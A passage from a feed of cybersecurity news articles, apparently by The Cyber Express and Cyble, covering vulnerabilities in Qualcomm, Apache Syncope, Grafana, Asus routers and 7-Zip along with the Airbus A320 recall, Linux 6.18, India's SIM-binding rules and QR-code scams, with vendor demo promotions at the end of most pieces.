• CVE-2025-47322: An automotive-focused Use-After-Free vulnerability in Linux OS, rated Medium with a High CVSS score of 7.8. Reported on February 7, 2025, and disclosed to customers on June 2, 2025, it affects dozens of chip families across the automotive, compute, mobile, and IoT markets. 

Guidance to OEMs and Ecosystem Partners 

Qualcomm’s latest security bulletin confirms that patches for high-impact vulnerabilities, including the critical boot issue CVE-2025-47372, are already being shared with manufacturers, who are urged to deploy them on released devices as soon as possible. The company also advised users to check patch availability with their device OEMs, noting that the list of affected chipsets may not be complete.  The wide range of vulnerabilities, spanning secure boot, TrustZone firmware, DSP services, and camera components, shows how deeply these flaws extend across Qualcomm’s ecosystem. As Qualcomm continues issuing security alerts, fast and accurate vulnerability remediation remains essential for organizations operating devices built on these platforms.  Platforms such as Cyble’s vulnerability management can support this effort by providing real-time intelligence, asset-level visibility, and clear prioritization of high-risk weaknesses. These capabilities help teams identify critical exposures earlier and respond more effectively.  To improve your organization’s readiness against chipset-level threats and fast-moving vulnerabilities, request a personalized demo with Cyble today. 

Airbus has entered the final phase of its unprecedented global retrofit effort, confirming that fewer than 100 A320s in service still require updates after the discovery of a software vulnerability that triggered the largest emergency recall the manufacturer has ever executed. The company disclosed on Monday that nearly the entire A320-family fleet, about 6,000 aircraft worldwide, has now received the mandated modification. 

Origins of the Airbus Recall and Early Regulatory Response

The action followed a recent mid-air incident involving a JetBlue A320 in which the aircraft experienced a sudden altitude drop. Investigators later identified that intense solar flares may have compromised data essential to the jet’s flight-control functions, exposing a software vulnerability in the system managing the aircraft’s nose-angle performance. The incident alarmed regulators around the world and quickly led to mandatory retrofit orders across the global fleet of A320s.  Airbus moved quickly, implementing what it described as a “precautionary fleet action” and issuing an eight-page safety alert that initiated immediate groundings. The timing created operational chaos for many carriers, particularly in the United States, where the rush to complete the required updates collided with the heavy travel surge over the Thanksgiving weekend. Airlines from Asia to South America were compelled to take aircraft out of service with little warning as the scale of the issue emerged.  Sources familiar with the internal decision-making reported that the recall was initiated shortly after engineers drew a potential connection between the JetBlue event and the flawed software logic. The findings pointed to how solar radiation could corrupt flight-control data, prompting Airbus to request urgent repairs before allowing affected aircraft back into rotation.

Operational Disruptions Across Airlines Worldwide

The consequences were immediate for operators. Avianca, based in Colombia, suspended new bookings until December 8 in order to manage the grounding of its impacted A320s. Finnair and other carriers were forced to inspect their fleets on one aircraft at a time because Airbus’s initial alert did not list specific serial numbers, complicating efforts to determine which jets required urgent attention.  Airbus detailed the nature of the issue in a formal statement: “Analysis of a recent event involving an A320 Family aircraft has revealed that intense solar radiation may corrupt data critical to the functioning of flight controls. Airbus has consequently identified a significant number of A320 Family aircraft currently in-service which may be impacted.”  The company added that it worked “proactively with the aviation authorities” to implement available software and hardware protections, acknowledging the operational disruptions and apologizing to passengers while emphasizing that safety remains its “number one and overriding priority.” 

Implementing the Fix and Remaining Challenges

The mandated fix itself was relatively straightforward but required precise execution. Technicians reverted affected A320s to an earlier version of the software governing the aircraft’s nose-angle system. This involved uploading the legacy software through a data-loader device brought directly into the cockpit, a measure designed to prevent cyber interference. While the installation process was simple in principle, each aircraft had to be updated individually, creating workload bottlenecks for carriers with large fleets.  Airlines also faced an unexpected hurdle: a shortage of data loaders. One industry executive noted privately that some operators had only a handful of these devices on hand, slowing the pace of updates during a period when hundreds of A320s required immediate attention. In addition, an unspecified number of older aircraft will ultimately need full computer replacements rather than software changes, adding another layer of complexity for maintenance teams.  Even with these challenges, the majority of the fleet has now been restored to service, marking good progress just days after regulators issued their emergency directives. With fewer than 100 jets awaiting updates, Airbus appears close to closing one of the most disruptive safety events ever to affect the A320 family, an episode that reshaped holiday travel plans worldwide and highlighted the unexpected risks posed by solar radiation on modern aircraft systems. 

The Linux Kernel project reached another milestone with the official release of version 6.18, announced by Linus Torvalds. This update introduces a wide array of architectural changes, hardware enablement improvements, and feature adjustments, while also signaling a notable shift in how certain subsystems are maintained.  Although the release is immediately available from kernel.org or Torvalds’ public git tree, users are generally advised to wait for their distributions to publish the update in their stable repositories. 

Major Subsystem Changes and the Removal of Bcachefs 

One of the most consequential shifts in Linux 6.18 is the complete removal of native support for the Bcachefs file system from the mainline kernel. Bcachefs will now only be obtainable as a DKMS module, marking the first time a kernel release has fully detached it from the core codebase.  Alongside this change, Linux 6.18 introduces the Rust Binder driver and a new dm-pcache device-mapper target, enabling persistent memory to serve as a caching layer for slower block devices. Administrators on x86 platforms gain a new microcode= command-line option, offering greater flexibility in controlling microcode-loading behavior.  File system updates extend across multiple components. The kernel adds support for file handles within kernel namespaces and introduces initial block-size-greater-than-page-size handling for Btrfs. LoongArch KVM now includes PTW feature detection on newer hardware, while the kernel gains support for running as a guest under FreeBSD’s Bhyve hypervisor. 

Networking, Virtualization, and Performance Improvements 

Linux 6.18 brings a variety of enhancements to networking and virtualization capabilities. These include PSP encryption support for TCP connections, mixed CQE size support in shared ring buffers, additional Alder Lake-S SoC compatibility, AMD Secure AVIC guest support, and BPF arenas for the PowerPC architecture.  Performance-oriented improvements include better swap behavior and improved scaling for NFS servers, complemented by higher UDP receive performance. A new “sheaves” feature aims to optimize kernel memory allocation, while User-mode Linux gains support for sparse interrupts.  The EXT4 file system now supports 32-bit reserved user and group IDs and features a new ioctl() interface for querying and adjusting superblock parameters. The TCP stack receives early support for Accurate Explicit Congestion Notification (AccECN), and OverlayFS now provides case-folding functionality.  KVM has been updated to support control-flow enforcement technology (CET) on both Intel and AMD processors. Additional enhancements include SEV-SNP CipherText Hiding for x86 hosts and preserved vmalloc allocations through Kexec HandOver (KHO). Security updates range from multi-LSM support within the audit subsystem to the ability to sign BPF programs. The TPM feature TPM2_TCG_HMAC is now disabled by default. 

Hardware Enablement and Future Outlook for Linux Kernel

Linux 6.18 expands hardware coverage with new and updated drivers. These include an EDAC driver for AMD VersalNET memory controllers, which reports hardware issues from several IP blocks using IPC-style transport, and an EDAC driver for ADM Cortex-A72 cores to report L1 and L2 cache errors. Additional device-related improvements include a virtio SPI driver allowing SPI devices to operate within virtual machines, support for the DualSense controller’s audio jacks, extended HID handling for haptic touchpads, and enablement for Apple’s M2 Pro, M2 Max, and M2 Ultra SoCs.  With Linux 6.18 finalized, attention shifts to Linux 6.19. The first release candidate is scheduled for December 14, and the full release is expected in early February 2026. Because 6.18 is the final kernel release of the year, it stands as a strong contender to become the next LTS Kernel Series, though official confirmation awaits input from long-standing maintainer Greg Kroah-Hartman. 

India’s Department of Telecommunications (DoT) has introduced a shift in the way messaging platforms operate in the country, mandating the adoption of SIM-binding as a core security requirement. Under the Telecommunication Cybersecurity Amendment Rules, 2025, all major messaging services, including Telegram, and regional platforms such as Arattai, must ensure that their applications remain continuously linked to an active SIM card on the user’s device.   The mandate is part of the government’s intensified efforts to combat cyber fraud and strengthen nationwide cybersecurity compliance. The directive requires App-Based Communication Service providers to implement persistent SIM-linking within 90 days and submit detailed cybersecurity compliance reports within 120 days. The move seeks to eliminate longstanding gaps in identity verification systems that have enabled malicious actors to misuse Indian mobile numbers from outside the country. 

New Rules for SIM-Binding Communication 

According to the new requirements, messaging services must operate only when the user’s active SIM card matches the credentials stored by the app. If a SIM card is removed, replaced, or deactivated, the corresponding app session must immediately cease to function. The rules also extend to web-based interfaces: platforms must automatically log users out at least every six hours, requiring a QR-based reauthentication that is tied to the same active SIM.  These changes aim to reduce the misuse of Indian telecom identifiers, which authorities say have been exploited for spoofing, impersonation, and other forms of cyber fraud. By enforcing strict SIM-binding, the DoT intends to establish a clearer traceability chain between the user, their device, and their telecom credentials. 

Why Stricter Controls Were Needed 

Government observations revealed that many communication apps continued functioning even after the linked SIM card was removed. This allowed foreign-based actors to operate accounts associated with Indian mobile numbers without proper authentication. The ability to hijack accounts or mask locations contributed directly to an uptick in cybercrimes, often involving financial scams or identity theft.  Industry groups had previously flagged this vulnerability as well. The Cellular Operators Association of India (COAI), for instance, noted that authentication typically occurs only once, during initial setup, which leaves apps operational even if the SIM is no longer present. By requiring ongoing SIM-binding, authorities aim to close this loophole and establish reliable verification pathways essential for cybersecurity compliance.  The new mandate draws support from multiple regulatory frameworks, including the Telecommunications Act, 2023, and subsequent cybersecurity rules issued in 2024 and 2025. Platforms that fail to comply could face penalties, service restrictions, or other legal consequences under India’s telecom and cybersecurity laws. 

Impact on Platforms and Users 

Messaging platforms must redesign parts of their infrastructure to support real-time SIM authentication and implement secure logout mechanisms for multi-device access. They are also expected to maintain detailed logs and participate in audits to demonstrate cybersecurity compliance.  For users, the changes may introduce constraints. Accessing a messaging app without the original active SIM will no longer be possible. Cross-device flexibility, particularly through desktop or browser-based interfaces, may also be reduced due to the six-hour logout requirement. However, policymakers argue that these inconveniences are offset by a reduced risk of cyber fraud.  India’s focus on SIM-binding aligns with practices already common in financial services. Banking and UPI applications, for example, require an active SIM for verification to minimize fraud. Other regulators have taken similar steps: earlier in 2025, the Securities and Exchange Board of India (SEBI) proposed linking trading accounts to specific SIM cards and incorporating biometric checks to prevent unauthorized transactions. 

India Mandates Pre-Installed Cybersecurity App on Smartphones

In a parallel move to strengthen digital security, India’s telecom ministry has ordered all major smartphone manufacturers, including Apple, Samsung, Vivo, Oppo, and Xiaomi, to pre-install its cybersecurity app Sanchar Saathi on all new devices within 90 days, and push it via updates to existing devices. The app must be installed in a way that users cannot disable or delete it. Launched in January, Sanchar Saathi has already helped recover over 700,000 lost phones, blocked 3.7 million stolen devices, terminated 30 million fraudulent connections, and assists in tracking devices and preventing counterfeit phones. The app verifies IMEI numbers, blocks stolen devices, and combats scams involving duplicate or spoofed IMEIs. The move is aimed at strengthening India’s telecom cybersecurity but may face resistance from Apple and privacy advocates, as Apple traditionally opposes pre-installation of government or third-party apps. Industry officials have expressed concerns over privacy, user choice, and operational feasibility, while the government emphasizes the app’s role in digital safety and fraud prevention.

A cybersecurity experiment conducted by Sharjah Police has revealed how easily QR codes can mislead individuals, particularly when these codes promise conveniences such as free WiFi. The police placed an unbranded QR code in a public area with a simple message, “Free WiFi”, to measure how many people would scan it without verifying its source.  The results revealed that 89 members of the public scanned the code without asking who placed it or whether it was legitimate. According to Sharjah Police, the willingness to scan unfamiliar QR codes shows how quickly people act without considering potential cyber risks.  Officers stressed that the problem lies less in technology and more in user behavior. “A single scan can expose sensitive information,” police explained, noting that malicious QR codes can redirect users to fraudulent websites, initiate spyware downloads, or facilitate unauthorized access to personal accounts. With QR codes now common in restaurants, retail outlets, and advertising, attackers increasingly rely on this familiarity to trick unsuspecting users. 

User Behavior Identified Behind Free WiFi Vulnerability 

Sharjah Police stated that cybercriminals often depend on user interaction rather than technical loopholes. The force reiterated a simple rule for digital safety: Before scanning, ask yourself, ‘Do I trust the source?’ If the answer is uncertain, police advise against proceeding.  Authorities added that awareness remains the first line of defense. As QR codes continue to be integrated into payment systems, online services, and day-to-day transactions, taking a moment to verify the legitimacy of a code can prevent digital harm.  Sharjah Police also confirmed that they will continue launching public awareness initiatives to educate residents about new cyber threats and to promote safer online habits throughout the emirate. 

A Quick Look at Global Trends 

While Sharjah’s experiment stressed the local behavioral risks, similar concerns are coming out internationally. Cyble Research & Intelligence Labs (CRIL) recently published findings on an ongoing global quishing campaign it has named “Scanception.”  According to CRIL, this campaign uses QR codes embedded in phishing emails and PDF attachments to deliver credential-harvesting links. The attack shifts the threat to personal mobile devices, often outside an organization’s security perimeter, after victims scan the code. CRIL reported over 600 unique phishing PDFs and related emails discovered in just three months, with nearly 80% registering zero detections on VirusTotal.  These PDFs often mimic enterprise workflows, such as HR documents. One example involved a fake employee handbook with four pages of professional content, ending with a prompt to scan a QR code. In another case, victims who scanned a code were ultimately funneled to a counterfeit Office 365 sign-in portal designed to steal credentials through Adversary-in-the-Middle (AITM) techniques.   CRIL noted additional evasive features, including the detection of automation tools like Selenium or Burp Suite and the use of redirected URLs from trusted platforms such as YouTube, Google, Bing, Cisco, and Medium.  Targeting has been observed across more than 50 countries, with notable activity in North America, EMEA, and APAC, and concentrated attacks on Technology, Healthcare, Manufacturing, and BFSI sectors spanning more than 70 industries. 

Strengthening Public and Organizational Awareness 

Both Sharjah Police and Cyble’s research arm, CRIL, point to the same overarching lesson: the human element remains the most targeted and most vulnerable point in modern cyberattacks. Whether through a simple fake free WiFi QR code placed in a public space or through global campaigns like Scanception, attackers continue to exploit trust, familiarity, and routine digital behavior to bypass traditional security controls.  The guidance from experts is consistent; individuals and organizations must stay vigilant, verify QR code sources, strengthen security awareness programs, and adopt tools capable of analyzing attachments, embedded QR codes, and new attack patterns. A  Cyble, recognized globally for its AI-powered threat intelligence capabilities, continues to support enterprises through real-time intelligence, autonomous analysis, and advanced detection technologies.  To understand how Cyble can enhance your organization’s visibility and resilience, you can schedule a free demo or explore its AI-native security capabilities. 

The Department of Commerce’s vulnerability disclosure program (VDP), designed to protect its public-facing information technology systems, has been deemed “not fully effective” according to a recent audit conducted by the department’s Office of Inspector General (OIG). The audit highlights several shortcomings in the department’s approach to vulnerability disclosure and remediation.  The Commerce Department established its VDP in response to a directive from the Cybersecurity and Infrastructure Security Agency (CISA). This directive required all federal agencies to implement a vulnerability disclosure policy that allows members of the public to identify and report security vulnerabilities in internet-accessible government systems. Such programs are considered a critical component of federal cybersecurity efforts, enabling agencies to leverage external expertise to safeguard digital infrastructure.  However, the OIG’s audit, formally titled Audit of the Department’s Vulnerability Reporting and Resolution Program (Report Number OIG-26-002-A), found that the department’s program fell short in several key areas. “The Department established a vulnerability disclosure program; however, it was not fully effective,” the report states. Specifically, the audit found that not all internet-accessible systems were included in the VDP, testing guidelines restricted the tools public security researchers could use, reported vulnerabilities were not always fully remediated, and remediation deadlines were frequently missed. 

Gaps in Remediation and Vulnerability Reporting 

The OIG reviewed 71 resolved vulnerability disclosures and found that only 57 (80%) had been fully remediated, leaving 14 (20%) unresolved. Moreover, the audit indicated that since 2023, the department failed to meet established deadlines for remediating vulnerabilities approximately 35% of the time. “Without an effective vulnerability disclosure program, the Department cannot protect its internet-accessible systems, leaving them susceptible to potential compromise and exploitation,” the report warned.  The audit also highlighted structural issues with the VDP. The department limited its scope to 64 internet-accessible websites, excluding 22 department-owned or operated sites. Additionally, the contractor managing the VDP portal prohibited the use of automated scanners, tools widely used by public security researchers to detect vulnerabilities. 

OIG Recommendations and Next Steps 

To address these deficiencies, the OIG issued three recommendations. First, the department should revise its VDP testing scope to align with CISA’s Binding Operational Directive 20-01, which emphasizes including all internet-accessible systems in vulnerability disclosure efforts. Second, the department should update and implement standard operating procedures for vulnerability reporting and resolution to ensure comprehensive remediation across affected systems. Finally, the OIG recommended establishing an automated system to coordinate communication between contractors and bureaus and prompt timely action on delayed remediation efforts. 

The Importance of Vulnerability Disclosure Programs (VDPs) 

The OIG audit highlights the critical role of vulnerability disclosure programs (VDPs) in federal cybersecurity. CISA has emphasized that a strong VDP allows agencies to detect weaknesses before they are exploited, ensuring that vulnerabilities reported by security researchers are systematically assessed, tracked, and remediated.  Organizations looking to strengthen their cybersecurity posture can leverage platforms like Cyble, a world-leading AI-powered threat intelligence solution. Cyble provides real-time visibility into exposed assets, vulnerabilities, and emerging threats, helping organizations proactively manage risk.  Trusted by enterprises and federal agencies worldwide, Cyble’s AI-driven tools, including Blaze AI, automate threat detection, vulnerability management, and incident response, keeping systems protected before attackers strike.  Book a personalized demo and discover your vulnerabilities with Cyble Today! 

A critical security flaw has been uncovered in Apache Syncope, the widely used open-source identity management system, potentially putting organizations at risk of exposing sensitive password information.   Tracked as CVE-2025-65998, the vulnerability was publicly disclosed on November 24, 2025, by Francesco Chicchiriccò through the official Apache Syncope user mailing list. Credit for discovering the issue goes to Clemens Bergmann of the Technical University of Darmstadt. 

Understanding the CVE-2025-65998 Vulnerability 

The vulnerability specifically affects Apache Syncope instances configured to store user passwords in their internal database using AES encryption. While this configuration is not enabled by default, organizations that activate it may unknowingly introduce a significant security risk. The system relies on a hard-coded AES key embedded directly in the application’s source code.  This design oversight means that any attacker who gains access to the internal database can easily decrypt stored password values, recovering them in plaintext. This compromise poses a severe risk for account security, allowing unauthorized access, privilege escalation, and lateral movement within affected networks.  It is important to note that this flaw only affects passwords stored using the internal AES encryption feature. Other database attributes encrypted through key management mechanisms remain unaffected, as they use separate AES keys and proper encryption handling. 

Affected Versions 

Research indicates that multiple versions of Apache Syncope are vulnerable to CVE-2025-65998, including: 

• Apache Syncope (org.apache.syncope.core:syncope-core-spring) 2.1 through 2.1.14 
• Apache Syncope (org.apache.syncope.core:syncope-core-spring) 3.0 through 3.0.14 
• Apache Syncope (org.apache.syncope.core:syncope-core-spring) 4.0 through 4.0.2 

Organizations running these versions are strongly advised to upgrade to patched releases—version 3.0.15 or 4.0.3—to mitigate the risk. The update replaces the vulnerable hard-coded AES key approach with a more secure key management process, ensuring that password data cannot be trivially decrypted even if the database is compromised. 

Potential Impact 

Exploitation of CVE-2025-65998 can have serious operational consequences. Once an attacker accesses the internal database, all passwords stored with the default AES encryption method can be decrypted, exposing users’ credentials.   This breach can lead to unauthorized account logins, elevated privileges, and potential internal movement across systems, amplifying the threat to organizational security. Francesco Chicchiriccò, in the advisory posted to the Apache Syncope mailing list, emphasized the importance of upgrading affected systems promptly:  “Apache Syncope can be configured to store user password values in the internal database with AES encryption, though this is not the default option. When AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker, once obtaining access to the internal database content, to reconstruct the original cleartext password values.”  Clemens Bergmann of the Technical University of Darmstadt is credited with identifying this security gap, bringing attention to the risks associated with embedded AES encryption keys without proper key management. 

Mitigation Steps 

Administrators should promptly review their Apache Syncope deployments. Systems using AES encryption for internal password storage must be updated to versions 3.0.15 or 4.0.3, and key management practices should be strengthened to avoid hard-coded keys.  Cyble can help organizations proactively identify exposed assets and vulnerabilities, providing AI-powered threat intelligence and automated recommendations to prevent credential compromise.   Protect your organization from vulnerabilities like CVE-2025-65998. Leverage Cyble’s AI-powered threat intelligence to uncover exposed assets, assess risks, and secure your systems. Book a free demo today. 

Grafana Labs has issued a warning regarding a maximum-severity security flaw, identified as CVE-2025-41115, affecting its Enterprise product. The vulnerability can allow attackers to impersonate administrators or escalate privileges if certain SCIM (System for Cross-domain Identity Management) settings are enabled.  According to the company, the issue arises only when SCIM provisioning is activated and configured. Specifically, both the enableSCIM feature flag and the user_sync_enabled option must be set to true. Under these conditions, a malicious or compromised SCIM client could create a user with a numeric externalId that directly maps to an internal account, potentially even an administrative account. 

SCIM Mapping Flaw (CVE-2025-41115) Enables Impersonation Risks 

In SCIM systems, the externalId attribute functions as a bookkeeping field used by identity providers to track user records. Grafana Labs’ implementation mapped this value directly to the platform’s internal user.uid. Because of this design, a numeric external ID such as “1” could be interpreted as an existing Grafana account. This behavior opens a door for impersonation or privilege escalation, enabling unauthorized users to assume the identity of legitimate internal accounts.  Grafana Labs notes in its documentation that SCIM is intended to simplify automated provisioning and management of users and groups, particularly for organizations relying on SAML authentication. The feature, available in Grafana Enterprise and certain Grafana Cloud plans, remains in Public Preview. As a result, breaking changes may occur, and administrators are encouraged to test the feature thoroughly in non-production environments before deployment. 

SAML Alignment Required to Prevent Authentication Mismatches 

A major security requirement highlighted by Grafana Labs involves the alignment between the SCIM externalId and the identifier used in SAML authentication. SCIM provisioning relies on a stable identity provider attribute, such as Entra ID’s user.objectid, which becomes the external ID in Grafana. SAML authentication must use the same unique identifier, delivered through a SAML claim, to ensure proper account linkage.  If these identifiers do not match, Grafana may fail to associate authenticated SAML sessions with the intended SCIM-provisioned accounts. This mismatch can allow attackers to generate crafted SAML assertions that result in unauthorized access or impersonation. The company recommends using the assertion_attribute_external_uid setting to guarantee that Grafana reads the precise identity claim required to maintain secure user associations.  To reduce risk, Grafana requires organizations to use the same identity provider for both user provisioning and authentication. Additionally, the SAML assertion exchange must include the correct userUID claim to ensure the system can link the session to the appropriate SCIM entry. 

Configuration Requirements, Supported Workflows, and Automation Capabilities 

Administrators can set up SCIM in Grafana through the user interface, configuration files, or infrastructure-as-code tools such as Terraform. The UI option, available to Grafana Cloud users, applies changes without requiring a restart and allows more controlled access through restricted authentication settings.  Grafana’s SCIM configuration includes options for enabling user synchronization (user_sync_enabled), group synchronization (group_sync_enabled), and restricting access for accounts not provisioned through SCIM (reject_non_provisioned_users). Group sync cannot operate alongside Team Sync, though user sync can. Supported identity providers include Entra ID and Okta.  SCIM provisioning streamlines user lifecycle tasks by automating account creation, updates, deactivation, and team management, reducing manual administrative work and improving security. Grafana notes that SCIM offers more comprehensive, near real-time automation than alternatives such as Team Sync, LDAP Sync, Role Sync, or Org Mapping.  Grafana Labs is urging organizations to review their SCIM and SAML identifier mappings immediately, warning that inconsistencies may lead to unauthorized access scenarios tied to CVE-2025-41115.  In parallel, cybersecurity intelligence leaders such as Cyble continue tracking identity-related risks and misconfigurations across global environments. Security teams looking to strengthen visibility, detect threats earlier, and reduce exposure can explore Cyble’s capabilities, book a free demo to see how Cyble’s AI-driven threat intelligence enhances defense across cloud, endpoints, and identity systems. 

Cybersecurity firm CrowdStrike confirmed the termination of a “suspicious insider” who allegedly shared internal information with hackers. The move came after an internal investigation revealed that the individual had leaked images of his computer screen externally, potentially exposing sensitive company dashboards.  The hacker collective known as Scattered Lapsus$ Hunters later posted screenshots on a public Telegram channel, claiming insider access to CrowdStrike systems. The images reportedly included dashboards with links to internal resources, such as employees’ Okta dashboards, which are used to access company applications. 

The CrowdStrike Insider Threat Incident 

In a statement to The Cyber Express, a CrowdStrike spokesperson clarified the situation:

“We identified and terminated a suspicious insider last month following an internal investigation that determined he shared pictures of his computer screen externally. Our systems were never compromised, and customers remained protected throughout. We have turned the case over to the relevant law enforcement agencies.” 

The hackers alleged that they gained access to CrowdStrike through a recent breach at Gainsight, a customer relationship management platform used by Salesforce clients to manage customer data. According to their claims, the stolen information from from this was leveraged to breach the cybersecurity company's internal systems. However, CrowdStrike rejected these as “false” claims. 

Understanding Scattered Lapsus$ Hunters 

The Scattered Lapsus$ Hunters collective operates as a “supergroup,” combining the capabilities of multiple cybercriminal organizations. Its members draw expertise from Scattered Spider, LAPSUS$, and ShinyHunters to conduct high-impact campaigns targeting high-value enterprise environments, particularly SaaS platforms, as well as companies in retail, aviation, fashion, and insurance.  Scattered Spider, also known under aliases such as UNC3944, 0ktapus, and Octo Tempest, focuses on IT help desks, telecommunications, and large enterprise environments. Its members, often aged 19–22, are known for advanced social engineering tactics including SMS phishing (smishing), phone-based help-desk impersonation, and SIM swapping.   LAPSUS$ first drew attention with a ransomware attack on the Brazilian Ministry of Health in December 2021, which compromised millions of COVID-19 vaccination records. Since then, it has targeted major technology companies.   ShinyHunters is a financially motivated group specializing in data theft and extortion rather than ransomware. Active from 2020, it primarily exploits SaaS and cloud platforms via social engineering, including vishing (voice phishing), followed by large-scale data exfiltration. The group has continued operations, introducing a ransomware variant called shinysp1d3r that targets VMware ESXi hosts.  This is an ongoing story, and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on this insider threat incident or any additional information on Scattered Lapsus$ Hunters.  The CrowdStrike insider incident highlights the risk of suspicious insiders who break the organizations from the inside. Groups like Scattered Lapsus$ Hunters take advantage of such insiders to steal information from big organizations. While CrowdStrike confirmed no systems were compromised, the case denotes the importance of proactive threat intelligence and continuous monitoring.   Platforms like Cyble, with AI-powered threat detection and autonomous cybersecurity capabilities, demonstrate how organizations can identify exposed assets, track insider activity, and mitigate risks before they escalate.  

Experience Cyble firsthand—book a free demo to uncover vulnerabilities and detect suspicious insiders right now. 

As anticipation builds for the 2025 Formula 1 season, cybersecurity professionals are cautioning that the excitement surrounding the Las Vegas Grand Prix extends far beyond the racetrack. The event, scheduled for November 22, 2025, will mark the twenty-second round of the 2025 Formula One World Championship at the Las Vegas Strip Circuit in Paradise, Nevada. Alongside the massive crowds and economic activity expected that weekend, experts say digital threats are also preparing to accelerate.

Formula 1 Event Creates a Prime Target for Cybercrime 

In the lead-up to the race, both locals and visitors are being warned about phishing attempts, text-based schemes, and an especially concerning trend: the QR code scam. These threats, which often rely on urgency and impersonation, are expected to spike as hundreds of thousands of people arrive in the city.  One common scam scenario involves a supposed text offering a last-minute ticket upgrade or a QR code promising discounted parking. A single tap could open a pathway for attackers to harvest personal data.  Cybersecurity expert Anne Cutler noted that global events draw criminal attention. “When you have a big event like this, it puts a target on Las Vegas’ back. Cyberattacks can be absolutely crippling. It can affect businesses… everything from infrastructure to utilities,” she said.  Cutler warned that residents face the same risks as visitors. “Cyber criminals know we’re all hyped up about F1 right now. You might get emails that sound too good to be true,” she said. Fake messages impersonating race teams, hotels, or ticket vendors are expected to circulate heavily during the Las Vegas Grand Prix.  She added that weak passwords, outdated apps, and unpatched devices can make individuals more vulnerable, especially during high-traffic events. “You need strong, unique passwords for every account,” Cutler emphasized. Nevada’s constant influx of money, tourism, and movement also makes it an appealing target. “You don't want to fall for a phishing attack that steals your credentials or downloads malware,” she said.  Beyond traditional phishing, experts are concerned about quishing, a form of QR-based phishing. This QR code scam has grown, especially as QR codes have become a common part of daily life.  According to the FBI, scams cost Americans $16 billion last year, and Keener noted that about a quarter of those cases involved QR codes. The FTC has also warned the public about fake QR codes appearing on mailed packages, public signs, and promotional materials, which can redirect users to malicious websites or deploy malware. 

Conclusion 

With the Formula 1 Las Vegas Grand Prix approaching, experts urge caution against QR code scams and other digital threats. Attendees and locals should avoid scanning unsolicited codes on walls, sidewalks, or over existing signs, and report any scams to the authorities.  Organizations can stay protected from cybercriminals using intelligence-driven platforms like Cyble, which combines AI-powered threat detection, automated response, and real-time monitoring of phishing campaigns, brand impersonation, and vulnerabilities.  Schedule a free Cyble demo to uncover risks and protect your organization before high-risk events, such as the Las Vegas Grand Prix. 

According to the Indian Computer Emergency Response Team (CERT-In), thousands of households, small offices, and service providers across the country may already be at risk due to a newly uncovered authentication bypass flaw tracked as CVE-2025-59367. India’s national cybersecurity agency has issued a security alert after identifying a severe vulnerability in several widely used Asus DSL-series WiFi routers. The warning, published in CERT-In Vulnerability Note CIVN-2025-0322, outlines how remote attackers could infiltrate specific router models without user involvement. The affected devices include the Asus DSL-AC51, DSL-N16, and DSL-AC750, three routers that are common in home and SOHO environments relying on DSL internet connections.  CERT-In states that the flaw enables an attacker to bypass login controls and gain unrestricted access to the router’s administrative interface. Once the router is compromised, the intruder could alter configuration settings, observe or reroute internet traffic, intercept personal or financial information, or even compromise connected devices. The agency describes the risks to confidentiality, integrity, and availability as “critical.” 

CVE-2025-59367 Enables Authentication Bypass and Network Compromise 

In its advisory, CERT-In explains that a "vulnerability has been reported in ASUS DSL series routers that allows a remote attacker to gain unauthorized access into the affected system.” The agency notes that the issue affects the DSL-AC51, DSL-N16, and DSL-AC750 models and warns that successful exploitation could result in unauthorized access, modification of configuration parameters, access to sensitive information transmitted through the router, and compromise of connected systems.  The advisory is targeted at IT and network administrators, SOC analysts, SMB operators, home and SOHO users, and managed service providers or ISPs, highlighting the widespread nature of the vulnerability. CERT-In’s assessment reiterates that the authentication bypass flaw, identified as CVE-2025-59367, poses direct threats to data confidentiality and system integrity.  The report also details the broader context of the Asus DSL series line, explaining that these devices serve as integrated modem-router units for environments dependent on DSL connections. Because these routers often operate as central networking hubs, any breach may expose all devices and data flowing through the network.  The advisory includes a directive: “Apply appropriate security updates as mentioned in: https://www.asus.com/security-advisory.” CERT-In urges users to immediately install the firmware patches that Asus has begun releasing for the affected models. The agency also recommends that users change default passwords, disable remote management functions unless necessary, and review router security settings for any misconfigurations. Monitoring router logs for abnormalities has also been emphasized as a crucial preventive step. 

Conclusion  

Asus rolls out patches for the authentication bypass flaw CVE-2025-59367; CERT-In is urging all users of affected DSL-series routers to apply updates immediately. The agency has reiterated the seriousness of the vulnerability and advised users to review their router settings, update firmware through the Asus security advisory page, and remain alert to suspicious activity. Incidents like CVE-2025-59367 show how essential it is for organizations to have reliable insight into new vulnerabilities. Cyble supports this need through detailed vulnerability intelligence, helping teams identify high-risk issues, track exploit activity, and prioritize remediation across assets and products. Its intelligence goes beyond standard CVE and NVD listings, offering context on exploits, attack methods, and threat actor discussions.  Schedule a personalized demo with Cyble to assess how its intelligence platform can support your security operations. 

A newly discovered security flaw, identified as CVE-2025-11001, is targeting users across both public and private sectors. The vulnerability, affecting all versions of 7-Zip before 25.00, allows attackers to execute malicious code remotely, potentially compromising critical systems. NHS Digital issued a cyber alert urging organizations and users to take immediate action. 

Details of the CVE-2025-11001 Vulnerability

CVE-2025-11001 is classified as a file-parsing directory traversal remote code execution vulnerability. With a CVSS score of 7.0, the flaw is considered high severity. Exploitation occurs through 7-Zip’s handling of symbolic links during the extraction of archive files. By crafting malicious archives, attackers can manipulate 7-Zip to write files outside the intended extraction directory. This misbehavior enables the placement of executable files in sensitive system locations, which can then be triggered to execute arbitrary code.  Security researchers have released a proof-of-concept (PoC) exploit demonstrating how CVE-2025-11001 can be leveraged. While the PoC does not constitute a fully weaponized attack, it lowers the barrier for cybercriminals, making unpatched systems increasingly vulnerable. 

Impact and Threat Assessment

All 7-Zip versions before 25.00 are at risk, which includes a vast number of enterprise systems, government agencies, and personal computers. The NHS Digital cybersecurity team has classified this issue as Threat ID CC-4719 with medium severity, highlighting the urgent need for patching.  Although initial reports suggested active exploitation in the wild, a subsequent update on November 20, 2025, clarified that no confirmed exploitation of CVE-2025-11001 has been observed by NHS England’s National Cyber Security Operations Centre (CSOC). The National CSOC did confirm the existence of the public PoC exploit and indicated that potential exploitation remains likely in the future if systems are left unpatched.  Given the deployment of 7-Zip across multiple environments, the potential attack surface is significant. A successful attack could allow unauthorized access to sensitive systems and facilitate the deployment of additional malware payloads. 

Remediation and Recommendations

